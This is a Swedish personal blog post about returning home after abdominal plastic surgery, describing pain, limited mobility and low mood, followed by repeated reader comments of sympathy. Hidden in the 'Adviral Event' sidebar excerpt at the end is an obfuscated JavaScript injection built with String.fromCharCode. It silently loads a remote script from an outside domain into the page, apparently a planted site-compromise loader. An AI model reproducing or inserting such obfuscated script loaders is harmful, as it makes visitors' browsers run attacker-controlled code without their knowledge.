Tufft att komma hem… !

imagehej igen! Ojojoj! Vilken dag! Krymplingen ni ser är ingen annan än jag…. Två dagar efter operation är statusen, trött, medtagen, ostabilt med extrem smärta från och till… MEN med all medicin man har idag så kan man verkligen dämpa smärtan. Att vara nyopererad innebär att man måste låta sin kropp vila. (Oavsett operation) detta är min absolut sämsta sida, jag skyndar gärna vidare med alla mina projekt! -Men inte denna gången! 

image

med lite blandade känslor var det dags att säga ”hej då” till citadell kliniken. Jag som precis börjat känna mig hemma där, och framförallt känt fullt förtroende för alla fantastiska människor som jag fått ha runtomkring mig. Jag fick en regäl ”cocktail” med medicin innan jag skulle sätta mig i bilen i över fyra timmar! 

imageefter några meter fick jag stanna och pausa då jag inte orkade ta mig längre…

-föll ihop på stolen en stund, tills Kerstin kom upp för att krama om mig innan hemfärd… -underbara människa!  

Efter kram kalaset så var det några meter i taget, för att stanna, pusta och vila samtidigt som jag som en krympling hängde armkrok i famnen på min väninna… 

imageFina underbara Sara som hämtade mig ända nere i Landskrona,

-Tusen tack min vän!

Jag kompenserar dig ordentligt när jag är på benen igen….

När vi stannade för en kiss-paus så försökte jag ta mig ur bilen själv, vilket slutade med att jag hängde över bilen på ett märkligt sätt. Sara skrattade så att tårarna rann, vad blir effekten utav det??? Jo att skrattanfallet smittar av sig på mig, och varje gång jag skrattar så känns det som om jag ska spricka!!!! -så för Guds skull tänk på mindre roliga saker försökte jag blunda och intala mig själv! Resan hem gick bra, jag halvlåg och rörde mig inte ur fläcken. All onödig smärta undvikes!

imageSara hjälpte mig ur bilen och upp i lägenheten med all packning. Jag ligger nu nerbäddad i min säng där jag somnade strax efter att hon lämnat mig här…..  Bilfärden hem tömde mina batterier….. -jag är HELT slut!

Att ta mig i och ur sängen är ett projekt, att gå till och från toaletten är också ett projekt….. Hmm, inte helt lätt att vara själv faktiskt! Ännu svårare var det att få på mig gödeln när jag väl har lyckats knäppa upp den. Jag ska lufta magen, morgon och kväll….

Min mage var varken mer eller mindre svullen idag, ganska oförändrat läge sedan igår… 🙂 missfärgningarna och svullnaden kommer att börja avta efter första Veckan. Något som är lite obehagligt är att jag inte har någon känsel på huden just nu…. det var jag inte beredd på, men det är tydligen fullt normalt 🙂

-MEN så svårt att få på sig gödlarna själv igen! (Två stycken)  nästintill omöjligt själv!!!

Sen började jag fundera på hur jag skulle kunna ta en dusch.  i min lägenhet så har jag badkar, jag kommer ALDRIG att kunna ta mig över kanten! Så duscha får jag göra någon annanstans….. Sjukhussängen var betydligt lättare att komma i och ur, min egna säng är en mardröm just nu! ”borta bra men hemma bäst” -nja, inte i detta fallet! 

Jag känner mig lite halv deppig just för stunden…. Måste erkänna att det var ganska tufft att komma hem och därför känner jag mig lite deppig…

jag har nog inte heller ”landat” hemma än…. Några timmar till, sen känns det nog bättre 🙂

image

MEN, det kan bara gå åt ett håll 😉 Trots att jag just nu inte är på topp så är jag ändå glad att jag äntligen förverkligat min dröm….. <3

Alla ni som mailar, kommenterar, likar, ni är verkligen ett enormt stöd, TACK!  

Jag gör verkligen mitt bästa för att svara på alla era frågor men då bloggen och mail inkorgen fullkomligt exploderat sista dagarna så hinner jag inte med….

OM du precis har hittat hit så kan du backa några inlägg och hitta många utav svaren på dom vanligaste frågorna I mina senaste inlägg…  tre inlägg bakåt så pågår dessutom en jätte rolig tävling 🙂

kramar my Martens

PS för er som är nya här, jag HAR lagt upp före bilder på min mamma mage, för ca 1 vecka sedan….

 

33 Komentarer

 1. Så snygg mage du fått =)
  Men nu måste du ta det lugnt… o inte skratta, hosta eller nysa…. hepp! !
  Skönt med fina nära vänner som du får stöd av..
  Att ta sig ur sängen, rullvarianten kanske..
  Skönt att få komma hem trots allt.
  Kram o vila <3

 2. Stackare. Jag bor också ensam och vet hur det är att inte ha någon när man är dålig. Att bara att fixa sig lite mat är ett helt företag. Hoppas att det finns någon som kan hjälpa dig lite.

 3. Så snygg mage du fått =)
  Men nu måste du ta det lugnt… o inte skratta, hosta eller nysa…. hepp! !
  Skönt med fina nära vänner som du får stöd av..
  Att ta sig ur sängen, rullvarianten kanske..
  Skönt att få komma hem trots allt.
  Kram o vila <3

 4. Stackare. Jag bor också ensam och vet hur det är att inte ha någon när man är dålig. Att bara att fixa sig lite mat är ett helt företag. Hoppas att det finns någon som kan hjälpa dig lite.

 5. Förstår dig. Fick kejsarsnitt o det är ju inte lika tufft som din. Men det där med att skratta o ta sig upp ur sängen. Mycket lättare på sjukhuset. Jag liksom rullade mig ur sängen ner på knä o sen upp för vår säng var så låg. Tror 90% minst av alla kommer förstå varför du gjorde det o bara heja på. De övriga är såna som klagar på allt o alla vare sig det är att de jobbat stenhårt för att bli vältränade eller flaskmatar o är absolut inget att lyssna på ? ta hand om dig och skippa komedierna.

 6. Åh men fina, har du inte mor eller far eller syskon som kan komma och vara hos dig i några dagar, en vän som bor i närheten? Ska JAG komma över och hjälpa dig?! Har själv vart opererad flera gånger av olika anledningar, vissa av skönhetsoperationer och andra av måsten. Vet hur viktigt det är att ha någon vid sin sida och som hjälper en med alla ens grejer och vem ska laga mat, fixa kaffe och mackor till dig, hämta filten och allt vad du vill ha.
  Ta väl hand om dig, som du själv säger, skynda inte, ge det tid så att det läker ordentligt och fint.
  Heja dig tjejen, krya på dig.. eller vad man säger. ?

 7. Förstår dig. Fick kejsarsnitt o det är ju inte lika tufft som din. Men det där med att skratta o ta sig upp ur sängen. Mycket lättare på sjukhuset. Jag liksom rullade mig ur sängen ner på knä o sen upp för vår säng var så låg. Tror 90% minst av alla kommer förstå varför du gjorde det o bara heja på. De övriga är såna som klagar på allt o alla vare sig det är att de jobbat stenhårt för att bli vältränade eller flaskmatar o är absolut inget att lyssna på 🙂 ta hand om dig och skippa komedierna.

 8. Åh men fina, har du inte mor eller far eller syskon som kan komma och vara hos dig i några dagar, en vän som bor i närheten? Ska JAG komma över och hjälpa dig?! Har själv vart opererad flera gånger av olika anledningar, vissa av skönhetsoperationer och andra av måsten. Vet hur viktigt det är att ha någon vid sin sida och som hjälper en med alla ens grejer och vem ska laga mat, fixa kaffe och mackor till dig, hämta filten och allt vad du vill ha.

  Ta väl hand om dig, som du själv säger, skynda inte, ge det tid så att det läker ordentligt och fint.

  Heja dig tjejen, krya på dig.. eller vad man säger. 😉

 9. Det är det här jag avskyr med plastikklinikerna! Att skicka hem patienter så absolut inte färdigvårdade! Hur i hela helskotta ska du klara att byta, lufta, hålla dig fräsch???? Hade det varit SERIÖST PÅ RIKTIGT skulle 42000 sek innefattat minst dubbla vårdtiden! Du beundrar DrTuve och Citadellkliniken, jag tycker de sviker dig beträffande eftervården!

 10. Jag sov på soffan första veckan halvsittandes med en stoor kudde under knäna. Hade alldeles för ont för att kunna sitta/ligga bekvämt i sängen.

 11. Det är det här jag avskyr med plastikklinikerna! Att skicka hem patienter så absolut inte färdigvårdade! Hur i hela helskotta ska du klara att byta, lufta, hålla dig fräsch???? Hade det varit SERIÖST PÅ RIKTIGT skulle 42000 sek innefattat minst dubbla vårdtiden! Du beundrar DrTuve och Citadellkliniken, jag tycker de sviker dig beträffande eftervården!

 12. Jag sov på soffan första veckan halvsittandes med en stoor kudde under knäna. Hade alldeles för ont för att kunna sitta/ligga bekvämt i sängen.

 13. Har gjort två kejsarsnitt som ju inte går att jämföra med din operation men just dag2-3 var tuffa. Det ”hände” inte så mycket, blev varken bättre eller sämre och jag hade ONT! När det sen vände runt dag 4-5 så gick det ganska snabb åt rätt håll, båda gångerna. Hoppas att detsamma sker för dig. Krya!

 14. Har gjort två kejsarsnitt som ju inte går att jämföra med din operation men just dag2-3 var tuffa. Det ”hände” inte så mycket, blev varken bättre eller sämre och jag hade ONT! När det sen vände runt dag 4-5 så gick det ganska snabb åt rätt håll, båda gångerna. Hoppas att detsamma sker för dig. Krya!

 15. Hej My! Jag är en ny läsare på din blogg ? väldigt roligt att läsa om din bukplastik, jag gjorde bukplastik kombinerad fettsugning den 5 februari i år på citadellkliniken och även tuve som opererat mig. Kan verkligen hålla med om helt underbar personal ? idag är det 1 vecka och 3 dagar sedan Ja opererade mig och det blir bättre de lovar jag ? igår klarade jag duscha själv dock med hjälp över badkarskanten. Jag kan nästa stå helt rakt upp idag. Klarar inte av att stå längre stunder men de går framåt. Mycket fin mage du har fått. Lycka till! Kram Emelie

 16. Hej My! Jag är en ny läsare på din blogg 🙂 väldigt roligt att läsa om din bukplastik, jag gjorde bukplastik kombinerad fettsugning den 5 februari i år på citadellkliniken och även tuve som opererat mig. Kan verkligen hålla med om helt underbar personal 🙂 idag är det 1 vecka och 3 dagar sedan Ja opererade mig och det blir bättre de lovar jag 🙂 igår klarade jag duscha själv dock med hjälp över badkarskanten. Jag kan nästa stå helt rakt upp idag. Klarar inte av att stå längre stunder men de går framåt. Mycket fin mage du har fått. Lycka till! Kram Emelie

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/